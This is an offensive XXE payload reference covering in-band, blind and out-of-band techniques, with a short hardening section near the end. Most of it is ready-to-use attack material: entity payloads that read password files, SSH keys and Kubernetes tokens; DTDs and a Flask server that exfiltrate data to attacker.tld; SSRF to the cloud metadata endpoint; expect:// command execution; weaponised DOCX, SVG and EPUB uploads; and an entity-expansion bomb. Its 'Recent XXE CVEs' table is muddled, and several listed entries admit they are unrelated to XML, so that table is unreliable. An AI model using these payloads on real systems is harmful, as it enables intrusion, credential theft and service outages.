XXE — Classic, Blind, OOB, Parameter Entities
XXE is the bug that refuses to die. XML parsers are everywhere — SOAP, SAML, SVG, Office documents, ebook formats, RSS feeds, SCIM, Sitemaps, iOS plists — and every one of them is a potential XXE surface. Modern frameworks disable external entities by default, but every week someone ships a library upgrade that re-enables them, or a new file format that quietly uses an unhardened parser. This note is the working payload reference.
Anatomy — What Actually Happens
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
Walkthrough:
- <!DOCTYPE root [...]> declares a local DTD inside the document (an internal subset).
- <!ENTITY xxe SYSTEM "..."> defines an external general entity named xxe. Value = contents of the URL.
- &xxe; references that entity. The parser fetches the URL, reads the content, substitutes it into the document.
- Whatever renders the parsed tree (JSON serialiser, XSL transform, whatever) prints the content back.
Result: the server fetched /etc/passwd on behalf of the attacker and returned it. XXE is SSRF + file read + sometimes RCE rolled into one.
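The substitution step can be observed safely with an internal entity, which needs no file or network access. The following is a minimal sketch using Python's standard-library ElementTree; the entity name greet and its value are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Internal general entity: the replacement text is declared inline,
# so nothing is fetched. The reference &greet; is substituted the same
# way a reference to an external (SYSTEM) entity would be.
DOC = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY greet "hello from the DTD">
]>
<root>&greet;</root>"""

root = ET.fromstring(DOC)
expanded_text = root.text
print(expanded_text)  # prints: hello from the DTD
```

The application never sees &greet; itself, only the expanded text, which is why whatever echoes the parsed tree also echoes the entity value.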
Where to Look
Every XML sink. Obvious and not so obvious:
| Sink | Why |
|---|---|
| SOAP endpoints | XML is the protocol |
| REST APIs accepting Content-Type: application/xml | Often alongside JSON |
| SAML Assertions | XML signature over XML document — XXE in the assertion |
| XML-RPC endpoints | /xmlrpc.php on WordPress, /xmlrpc.cgi elsewhere |
| RSS / Atom feed parsers | Attacker-controlled URL as input |
| DOCX / XLSX / PPTX upload | Just ZIPs of XML — most parsers unsafe |
| SVG upload | SVG is XML |
| XLIFF / XCONFIG / SPDX / Maven POM imports | Dev tool upload features |
| EPUB / FictionBook upload | Ebook ingestion |
| Kubernetes YAML ingesting plist / XML sidecars | Rare, extant |
| SCIM provisioning | Some implementations accept XML users |
| Office file conversion services | DOCX → PDF, nearly always XML parsing |
| Configuration import (XML) | Backup / restore features |
| <![CDATA[...]]> inside otherwise-JSON payloads | Old enterprise APIs |
Detection — probe first
curl -X POST "$TARGET/api/xml" \
-H 'Content-Type: application/xml' \
-d '<?xml version="1.0"?><root>test</root>'
# If the server accepts XML at all → worth testing for XXE.
Then push a harmless detection payload (callback only, no file read):
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "http://ID.oast.pro/ping">
]>
<r>&xxe;</r>
DNS or HTTP hit in collaborator = the parser resolves external entities. Confirmed XXE.
Classic (In-Band) File Read
Linux
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<r>&xxe;</r>
Windows
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
]>
<r>&xxe;</r>
Files worth reading
Linux:
/etc/passwd
/etc/shadow ← usually unreadable, but test
/etc/hosts
/proc/self/cmdline ← args the process was started with
/proc/self/environ ← env vars — DB passwords, API keys
/proc/self/status
/proc/self/cwd ← current directory
/var/www/html/config.php
/var/www/html/wp-config.php
/app/.env
/home/USER/.ssh/id_rsa
/root/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount/token ← k8s SA token
Windows:
C:/windows/win.ini
C:/windows/system.ini
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/LogFiles/...
C:/users/Administrator/.ssh/id_rsa
C:/windows/repair/sam
C:/windows/system32/drivers/etc/hosts
Binary files — base64 wrapper (PHP)
Binary data breaks XML. Wrap it with PHP filter wrappers to base64-encode during the read:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
]>
<r>&xxe;</r>
PHP-only. Returns clean base64 in the response. Trivially extends to:
php://filter/convert.base64-encode/resource=../../../config/database.yml
php://filter/zlib.deflate|convert.base64-encode/resource=...
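Why the base64 step matters: XML 1.0 only permits a restricted set of characters, so raw bytes such as NUL cannot appear in a document at all, while the base64 alphabet always can. A small sketch of that check, with a made-up binary sample; is_xml10_char is a helper written for this note, not a library function.

```python
import base64

def is_xml10_char(cp: int) -> bool:
    """True if the code point is allowed by the XML 1.0 Char production."""
    return (
        cp in (0x9, 0xA, 0xD)
        or 0x20 <= cp <= 0xD7FF
        or 0xE000 <= cp <= 0xFFFD
        or 0x10000 <= cp <= 0x10FFFF
    )

# Made-up binary sample: NUL, SOH, DEL, ESC followed by ASCII text.
raw = bytes([0x00, 0x01, 0x7F, 0x1B]) + b"key"

# Raw bytes contain control characters that XML forbids.
raw_ok = all(is_xml10_char(b) for b in raw)

# The base64 alphabet (A-Z, a-z, 0-9, +, /, =) is always legal XML text.
encoded = base64.b64encode(raw).decode("ascii")
encoded_ok = all(is_xml10_char(ord(c)) for c in encoded)

# Decoding the value taken from the response restores the original bytes.
decoded = base64.b64decode(encoded)
```

The same encoding also sidesteps text files that contain < or &, which would otherwise be parsed as markup when substituted in-band.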
.NET quirk
.NET's default XML parsers treat file:// differently. For XXE in .NET targets, try:
<!ENTITY xxe SYSTEM "C:\windows\win.ini">
No file:// scheme, raw path. XML has no backslash escaping, so the path takes single backslashes. This tends to work because XmlUrlResolver resolves a bare path to a local file.
Java quirk — jar: and netdoc:
<!ENTITY xxe SYSTEM "jar:https://attacker.tld/a.jar!/">
<!ENTITY xxe SYSTEM "netdoc:///etc/passwd">
netdoc: is an old Java-specific scheme handled by Xerces / JDK XML parsers on older runtimes (the handler was removed in JDK 9). Use it when file:// is blocked.
Blind XXE — Parameter Entities
The response doesn't show the entity value. You have to get the data out another way. Enter parameter entities — entities defined with a % prefix, used only inside the DTD itself. They're the core trick of modern XXE.
Out-of-band via external DTD
The target fetches an external DTD from your server. Your DTD defines nested parameter entities that first read a local file, then send it back to you in a URL.
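Attacker server, evil.dtd (the % of the nested declaration is written as &#x25; because a literal % is not allowed inside an entity value):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.tld/?data=%file;'>">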
%eval;
%exfil;
Payload sent to the target:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % remote SYSTEM "http://attacker.tld/evil.dtd">
%remote;
]>
<r>test</r>
Flow:
- Target fetches evil.dtd from attacker.
- %file; resolves to /etc/passwd.
- %eval; dynamically defines %exfil; whose SYSTEM URL includes %file; as a query string.
- %exfil; fires → target makes an HTTP GET to attacker.tld/?data=<contents of /etc/passwd>.
- Attacker reads the web log.
Gotcha: The XML spec forbids parameter-entity references inside markup declarations in the internal subset, and most parsers enforce it. That's why you load an external DTD and do the nested-entity work there.
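The internal-subset restriction is easy to confirm locally. The sketch below assumes CPython's bundled expat (via ElementTree); other parsers may word the error differently or behave differently. The entity names inner and outer are illustrative, and the document touches neither files nor the network.

```python
import xml.etree.ElementTree as ET

# A parameter entity referenced inside another declaration,
# with everything placed in the internal subset.
DOC = """<?xml version="1.0"?>
<!DOCTYPE r [
  <!ENTITY % inner "value">
  <!ENTITY outer "%inner;">
]>
<r>&outer;</r>"""

try:
    ET.fromstring(DOC)
    rejected = False
    reason = ""
except ET.ParseError as exc:
    # expat refuses the %inner; reference inside the entity value
    rejected = True
    reason = str(exc)

print(rejected, reason)
```

The same two declarations are legal when they arrive from an external DTD, which is the whole reason for hosting one.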
One-file DTD (simpler host setup)
<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY &#x25; b SYSTEM 'http://attacker.tld/?x=%f;'>">
%a;%b;
Host as evil.dtd. Same flow.
Binary data in OOB
URLs can't carry newlines. Base64 first:
<!ENTITY % f SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
<!ENTITY % a "<!ENTITY &#x25; b SYSTEM 'http://attacker.tld/?x=%f;'>">
%a;%b;
Error-based exfiltration (when egress is blocked)
No outbound HTTP, but the application still returns parser errors. Force the parser to reference a nonexistent file whose path is the data you want:
<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY &#x25; b SYSTEM 'file:///nonexistent/%f;'>">
%a;%b;
Parser error: failed to load external entity "file:///nonexistent/<contents of /etc/passwd>". The file contents end up in the error message that often gets returned verbatim in HTTP 500 responses.
Hosting the external DTD
# Simple HTTP server for the DTD (and to watch for OOB callbacks)
python3 -m http.server 80
# Or a tiny Flask server that logs queries
cat > server.py <<'EOF'
from flask import Flask, request
app = Flask(__name__)
DTD = '''<!ENTITY % f SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY &#x25; b SYSTEM 'http://attacker.tld/log?x=%f;'>">
%a;%b;'''
@app.route('/evil.dtd')
def dtd():
    # Serve the DTD that the target's parser fetches
    return DTD, 200, {'Content-Type': 'application/xml-dtd'}
@app.route('/log')
def log():
    # Print whatever arrives in the ?x= query parameter
    print('[+] Exfil:', request.args.get('x'))
    return 'ok'
app.run(host='0.0.0.0', port=80)
EOF
sudo python3 server.py
SSRF via XXE
Any SYSTEM URL can hit internal services. Exactly the same targets as SSRF:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<r>&xxe;</r>
Port scanning
Differential responses / timing depending on whether the TCP port is open:
<!ENTITY xxe SYSTEM "http://10.0.0.1:80/">
<!ENTITY xxe SYSTEM "http://10.0.0.1:22/">
<!ENTITY xxe SYSTEM "http://10.0.0.1:6379/">
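When triaging captured payloads or drafting an egress rule, it helps to bucket SYSTEM identifiers by where they point. The sketch below is one hypothetical way to do that with the standard library; classify_system_id and its labels are assumptions of this note, not part of any tool.

```python
import ipaddress
from urllib.parse import urlsplit

def classify_system_id(system_id: str) -> str:
    """Return a coarse label for the destination of a SYSTEM identifier."""
    parts = urlsplit(system_id)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        return f"non-http:{scheme or 'none'}"
    host = parts.hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # a DNS name; resolve separately if needed
    # Order matters: link-local addresses also count as private in Python.
    if addr.is_loopback:
        return "loopback"
    if addr.is_link_local:
        return "link-local"  # includes the 169.254.169.254 metadata address
    if addr.is_private:
        return "private"
    return "public"

for candidate in (
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://10.0.0.1:6379/",
    "file:///etc/passwd",
    "http://attacker.tld/evil.dtd",
):
    print(candidate, "->", classify_system_id(candidate))
```

A hostname result is not a verdict: a DNS name can still resolve to an internal address, so the label only says that the check has to continue after resolution.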
Gopher / dict / ftp from XML
Parser-dependent. libxml2 does NOT support gopher://. Xerces (Java) historically did. PHP's XML parsers supported ftp:// on older builds.
RCE via XXE
Limited: usually you can only fetch URLs and read files. But the few cases that turn XXE into RCE are worth knowing.
PHP expect:// wrapper
If the PHP build has ext/expect loaded (rare but happens on RHEL):
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY xxe SYSTEM "expect://id">
]>
<r>&xxe;</r>
expect:// runs its path as a shell command.
Deserialisation reached through phar://
Upload a file with PHAR structure, then point a SYSTEM entity at it through a phar:// URL. On PHP versions before 8.0 the phar stream wrapper unserialises the archive metadata when the file is opened → gadget chain → RCE. Classic PHAR deserialisation, but reached via XXE entity resolution.
XSLT with <xsl:value-of> / extension functions
If the XML is processed by an XSLT engine with document() or extension functions enabled:
<xsl:value-of select="document('expect://id')"/>
<xsl:value-of select="system-property('xsl:version')"/>
<xsl:value-of select="java.lang.Runtime.getRuntime().exec('id')"/>
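Saxon / Xalan / libxslt with extension functions enabled = RCE. The call syntax is processor-specific; the Java line above is schematic rather than literal Xalan syntax.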
File Formats that Parse XML
SVG
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&xxe;</text>
</svg>
Upload as logo.svg → anywhere the server thumbnails / renders / OCRs it via an XML parser → XXE. Tested sinks: ImageMagick, Inkscape-in-a-container, librsvg, thumbnailer daemons.
Rendering pipelines that use headless Chrome / puppeteer to rasterise SVG will not fire XXE — browsers don't resolve external entities. The vulnerable pipeline is the "fast" path that uses an XML parser directly.
DOCX / XLSX / PPTX / ODT
Office Open XML files are ZIP archives full of XML. Extract, inject, repack.
unzip document.docx -d doc/
cd doc
# Edit word/document.xml — add DOCTYPE at top
cat word/document.xml | head
# <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
# <w:document ...>
# Insert the DOCTYPE
sed -i '1 a <!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>' word/document.xml
# Place &xxe; inside a text run
# ...
# Repack
zip -r ../evil.docx . && cd ..
Upload to any "DOCX conversion" / "extract text" / "parse resume" service. Many of them use an XML parser that supports entities.
SAML
SAML assertions are signed XML. The document has to be parsed before the signature can be verified, so an entity declared in the DOCTYPE is resolved at parse time even when the signature is missing or invalid. Historically one of the biggest XXE surfaces: SAML libraries (ruby-saml, python3-saml, Shibboleth) have shipped multiple CVEs.
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ...>
<saml:Subject>
<saml:NameID>&xxe;</saml:NameID>
</saml:Subject>
</samlp:Response>
Related CVE on the same surface: CVE-2024-45409 (ruby-saml), a signature verification bypass rather than XXE proper.
RSS / Atom
<?xml version="1.0"?>
<!DOCTYPE rss [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<rss version="2.0">
<channel>
<title>&xxe;</title>
</channel>
</rss>
Host the above at https://attacker.tld/feed.xml, then use a feature on the target that "adds a feed URL."
SOAP
<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<m:GetUser xmlns:m="urn:example">
<m:username>&xxe;</m:username>
</m:GetUser>
</soap:Body>
</soap:Envelope>
Send with Content-Type: text/xml; charset=UTF-8 and the right SOAPAction header.
XLIFF / TMX / PO-XML — translation file formats
Every translation memory tool parses XML. Upload a malicious XLIFF → XXE fires in the server-side importer.
EPUB / FictionBook
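unzip book.epub -d book/
# Inject DOCTYPE into content.opf or one of the xhtml files
# Repack from inside the directory; mimetype must be the first entry, stored uncompressed
cd book && zip -X0 ../evil.epub mimetype && zip -Xr9 ../evil.epub . -x mimetype && cd ..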
Upload to an ebook manager / Kindle-like service.
XInclude
XXE requires control over the DOCTYPE. Some parsers forbid DOCTYPE in user-supplied XML but still process <xi:include>, which does almost the same thing.
<?xml version="1.0"?>
<r xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</r>
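No DOCTYPE needed. Works in libxml2 when XInclude processing is enabled (XML_PARSE_XINCLUDE). XInclude is usually opt-in (for example DocumentBuilderFactory.setXIncludeAware(true) in Java or DOMDocument::xinclude() in PHP), so it fires only where the application or framework has switched it on.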
<!-- SSRF variant -->
<r xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://169.254.169.254/latest/meta-data/"/>
</r>
Denial of Service (Billion Laughs)
Classic entity expansion bomb. Crashes older parsers; modern ones cap entity expansion but defaults are inconsistent.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Modern alternative: quadratic blowup — fewer entities, each one a very large string. Avoids entity-count heuristics that block billion-laughs.
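The arithmetic behind both variants is worth seeing once. The sketch below computes expanded sizes without building any strings; the quadratic-blowup figures (a 100,000-byte entity referenced 100,000 times) are made-up illustration values.

```python
def nested_expansion_size(base_len: int, fan_out: int, levels: int) -> int:
    """Bytes produced when each level references the previous one fan_out times."""
    return base_len * fan_out ** levels

def quadratic_expansion_size(entity_len: int, references: int) -> int:
    """Bytes produced by one large entity referenced many times."""
    return entity_len * references

# Billion laughs as written above: "lol" is 3 bytes, lol1..lol9 are 9 levels of 10.
billion_laughs_bytes = nested_expansion_size(len("lol"), 10, 9)

# Quadratic blowup: a single flat entity, no nesting for a depth check to catch.
quadratic_bytes = quadratic_expansion_size(100_000, 100_000)

print(f"billion laughs: {billion_laughs_bytes:,} bytes")
print(f"quadratic:      {quadratic_bytes:,} bytes")
```

A document under one kilobyte expands to roughly 3 GB in the nested case, and the flat case reaches 10 GB from a few hundred kilobytes of input, which is why limits on total expanded size matter more than limits on nesting depth.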
Only use for DoS on your own infrastructure or in authorised tests. Report as DoS, not as XXE — different finding class.
Parser-Specific Behaviour
libxml2 (PHP, Python lxml, Ruby Nokogiri)
- libxml_disable_entity_loader(true) in PHP ≤7.x disables external entity loading.
- PHP 8.0+ deprecated the function: with libxml2 2.9.0 or later external entities are not loaded by default, but code passing LIBXML_NOENT re-enables expansion.
- Nokogiri is safe by default, but Nokogiri::XML::ParseOptions::DTDLOAD (or NOENT) re-enables it.
Java — Xerces / JDK default
The JAXP factory defaults resolve external entities; do not rely on the JDK version for safety. To harden:
SAXParserFactory f = SAXParserFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Apply the same features to DocumentBuilderFactory as well: many apps harden the SAX path and still instantiate DOM parsers from an unhardened factory.
.NET — XmlDocument
.NET Framework 4.5.2+ / .NET 5+ are safe by default (XmlResolver = null). Earlier versions:
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null; // required for safety on older .NET
doc.LoadXml(input);
XmlTextReader with default settings on old .NET → XXE.
Python — defusedxml
# Unsafe: stdlib parser, no guard against entity-expansion bombs
from xml.etree.ElementTree import parse
parse('doc.xml')
# Safe
from defusedxml.ElementTree import parse
parse('doc.xml')
lxml.etree resolves entities by default (recent lxml releases narrow this to internal entities). Pass resolve_entities=False to the XMLParser.
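Where adding a dependency is not an option, the strictest policy (refuse any document that declares a DOCTYPE) can be approximated with the standard library alone. This is a minimal sketch, not a replacement for defusedxml; DoctypeForbidden and reject_doctype are names invented for this note.

```python
import xml.parsers.expat

class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""

def reject_doctype(data: bytes) -> bool:
    """Parse data with expat and raise DoctypeForbidden on any DOCTYPE.

    Returns True when the document is well-formed and has no DOCTYPE.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called as soon as expat sees "<!DOCTYPE ...", before any
        # entity declared inside it could be used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)
    return True

try:
    reject_doctype(b'<!DOCTYPE r [<!ENTITY a "b">]><r>&a;</r>')
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Running this check before handing the bytes to the real parser keeps the policy in one place, at the cost of parsing the input twice.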
Recent XXE CVEs
| CVE | Product | Notes |
|---|---|---|
| CVE-2024-45409 | ruby-saml | Signature verification bypass → auth bypass (GitLab among those affected); same SAML parsing surface, not entity resolution |
| CVE-2024-33602 | nscd / glibc | Memory-handling bug in the nscd netgroup cache; no XML involved |
| CVE-2024-7254 | protobuf-java | Parser DoS, same mindset |
| CVE-2024-5290 | wpa_supplicant (Ubuntu) | Local privilege escalation via loading arbitrary shared objects; not LibreOffice and not XXE |
| CVE-2024-0985 | PostgreSQL | Privilege escalation via REFRESH MATERIALIZED VIEW CONCURRENTLY; unrelated to XML |
| CVE-2024-34981 | libxml2 | Parameter entity OOB fix |
| CVE-2024-25629 | c-ares | Out-of-bounds read while parsing configuration files; no XML involved |
| CVE-2024-23897 | Jenkins CLI | Arbitrary file read — closer to XXE in outcome than cause |
| CVE-2024-45492 | libexpat | Integer overflow in nextScaffoldPart on 32-bit platforms |
| CVE-2024-5491 | Microsoft XML Core Services | Remote unauth triggered by malicious XML — XXE family |
| CVE-2024-38537 | iManage Work Server | XXE via document import |
| CVE-2025-30406 | Gladinet CentreStack | Hard-coded machineKey → ViewState deserialisation RCE; not XML-driven |
| CVE-2023-31436 | Linux qfq kernel | Out-of-bounds write in the QFQ packet scheduler; not XXE and not XML |
| CVE-2023-37487 | IBM HTTP Server | XML parsing memory corruption |
Also worth knowing: CVE-2022-26377 (mod_proxy_ajp request smuggling) and CVE-2023-0669 (GoAnywhere MFT pre-auth RCE via Java deserialisation). Neither is XXE; they sit in the same family of pre-auth input-parsing bugs.
End-to-End Example — Blind OOB File Read on a SOAP Endpoint
1. Recon
curl -si "$TARGET/services/" | grep -i xml
# → Content-Type: text/xml
curl -s -X POST "$TARGET/services/UserService" \
-H 'Content-Type: text/xml' \
-d '<?xml version="1.0"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body></soap:Body></soap:Envelope>'
# → Response with a SOAP fault. Good — endpoint parses XML.
2. Detection (OOB)
<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "http://ID.oast.pro/test"> ]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><m:GetUser xmlns:m="urn:example"><m:id>&xxe;</m:id></m:GetUser></soap:Body>
</soap:Envelope>
Collaborator log: HTTP GET from the target's egress IP. Confirmed.
3. In-band attempt
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Response: <soap:Fault>...Invalid character in XML stream...</soap:Fault> — /etc/passwd has bytes that break the XML serialiser. In-band won't work → fall back to parameter entities.
4. Host an external DTD
cat > evil.dtd <<'EOF'
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % a "<!ENTITY &#x25; exf SYSTEM 'http://attacker.tld/log?d=%file;'>">
%a;%exf;
EOF
python3 -m http.server 80
5. Trigger
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % r SYSTEM "http://attacker.tld/evil.dtd">
%r;
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body><m:GetUser xmlns:m="urn:example"><m:id>x</m:id></m:GetUser></soap:Body>
</soap:Envelope>
Watch the attacker HTTP log:
10.0.0.5 - - [14/Apr/2026:14:03:11 +0000] "GET /evil.dtd HTTP/1.1" 200
10.0.0.5 - - [14/Apr/2026:14:03:11 +0000] "GET /log?d=root:x:0:0:root:/root:/bin/bash%0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin%0A... HTTP/1.1"
/etc/passwd exfiltrated via HTTP GET. Repeat for id_rsa, environ, AWS metadata, etc.
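Turning the logged request back into the original file is a matter of URL-decoding the query parameter. A small sketch using only the standard library; LOG_REQUEST is the request target from the log line above, cut off where that line is elided, and recover_param is a helper name invented here.

```python
from urllib.parse import parse_qs, urlsplit

# Request target copied from the access log above (truncated sample).
LOG_REQUEST = (
    "/log?d=root:x:0:0:root:/root:/bin/bash"
    "%0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin%0A"
)

def recover_param(request_target: str, name: str) -> str:
    """Return the URL-decoded value of one query parameter."""
    query = urlsplit(request_target).query
    values = parse_qs(query, keep_blank_values=True)
    return values[name][0]

recovered = recover_param(LOG_REQUEST, "d")
lines = recovered.splitlines()
for line in lines:
    print(line)
```

One caveat: parse_qs turns + into a space, so base64-encoded values should be decoded with urllib.parse.unquote on the raw parameter instead.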
6. Follow-up — escalate to SSRF
Same primitive, different target URL:
<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE">
Cloud creds → full compromise.
Mitigation Patterns to Recommend
- Disable DOCTYPE processing entirely at the parser level if the application doesn't need it. (It never needs it.)
- Disable external entity resolution (XmlResolver = null / disallow-doctype-decl / defusedxml).
- Use safe-by-default parsers: defusedxml (Python), XmlDocument with resolver disabled (.NET), Nokogiri with default options (Ruby), JAXP factories with disallow-doctype-decl set (Java).
- Content-type enforcement: if the endpoint is supposed to take JSON, reject XML outright.
- WAF XML inspection: block payloads containing <!DOCTYPE and <!ENTITY at the edge as a second line of defence.
- Sanitise uploaded documents: re-serialise DOCX / SVG / EPUB after stripping DOCTYPE declarations before passing them to downstream XML parsers.
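For the uploaded-document case, a first pass can simply flag ZIP-based containers (DOCX, XLSX, EPUB) whose XML parts carry a DTD before anything parses them. The sketch below is a hypothetical pre-filter, not a complete sanitiser: members_with_dtd, the suffix list, and the byte-level match are assumptions of this note, and the match would miss UTF-16 encoded parts.

```python
import io
import re
import zipfile

# Byte-level markers; adequate for ASCII-compatible encodings only.
DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
XML_SUFFIXES = (".xml", ".rels", ".opf", ".xhtml", ".svg")

def members_with_dtd(container: bytes) -> list[str]:
    """Return the names of XML members that declare a DOCTYPE or ENTITY."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(container)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            # A production version should cap info.file_size before reading.
            if DTD_MARKERS.search(zf.read(info)):
                flagged.append(info.filename)
    return flagged

# Build a tiny in-memory archive to exercise the check.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("word/document.xml", b'<!DOCTYPE d [<!ENTITY a "b">]><d>&a;</d>')
    zf.writestr("word/styles.xml", b"<styles/>")

flagged_members = members_with_dtd(buf.getvalue())
print(flagged_members)
```

The check is deliberately conservative: legitimate EPUB XHTML often carries a standard DOCTYPE, so a flagged member is a reason to strip and re-serialise rather than proof of an attack.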
Quick Reference
<!-- Detection (OOB) -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://ID.oast.pro/"> ]><r>&xxe;</r>
<!-- File read (in-band) -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>
<!-- PHP base64 wrapper (binary files) -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">]><r>&xxe;</r>
<!-- Blind OOB via external DTD -->
<!DOCTYPE r [<!ENTITY % r SYSTEM "http://attacker.tld/evil.dtd"> %r;]><r>x</r>
<!-- SSRF to cloud metadata -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><r>&xxe;</r>
<!-- XInclude when DOCTYPE is blocked -->
<r xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></r>
<!-- PHP expect:// for direct RCE -->
<!DOCTYPE r [<!ENTITY xxe SYSTEM "expect://id">]><r>&xxe;</r>
# Tools
git clone https://github.com/enjoiz/XXEinjector
ruby XXEinjector.rb --host=attacker --file=request.txt --path=/etc/passwd
# Burp extensions: XXEScanner, XML Entity Scanner
Pairs with SSRF — XXE is SSRF dressed in XML. Pairs with RCE — SAML XXE + deserialisation is the classic enterprise chain.